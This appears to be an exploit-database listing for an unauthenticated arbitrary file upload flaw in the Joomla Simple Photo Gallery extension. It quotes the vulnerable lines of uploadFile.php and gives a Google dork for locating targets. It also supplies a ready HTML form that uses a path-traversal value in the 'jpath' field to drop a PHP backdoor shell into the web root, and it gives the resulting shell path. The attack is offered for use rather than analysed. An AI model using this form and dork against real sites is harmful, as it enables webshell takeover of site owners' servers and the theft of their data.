Joomla Simple Photo Gallery Shell Upload

2015.04.02
Credit: CrashBandicot
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: inurl:com_simplephotogallery

###################################################################### # Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload # Google Dork: inurl:com_simplephotogallery # Date: 10.03.2015 # Exploit Author: CrashBandicot @DosPerl # OSVDB-ID: 119624 # My Github: github.com/CCrashBandicot # Vendor Homepage: https://www.apptha.com/ # Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery # Version: 1 # Tested on: Windows ###################################################################### # Vulnerable File : uploadFile.php # Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php 20. $fieldName = 'uploadfile'; 87. $fileTemp = $_FILES[$fieldName]['tmp_name']; 94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName; 96. if(! move_uploaded_file($fileTemp, $uploadPath)) # Exploit : <form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" > <input type="file" name="uploadfile"><br> <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br> <input type="submit" name="Submit" value="Pwn!"> </form> # Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php) # Shell Path : http://localhost/backdoor__[RandomString].php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top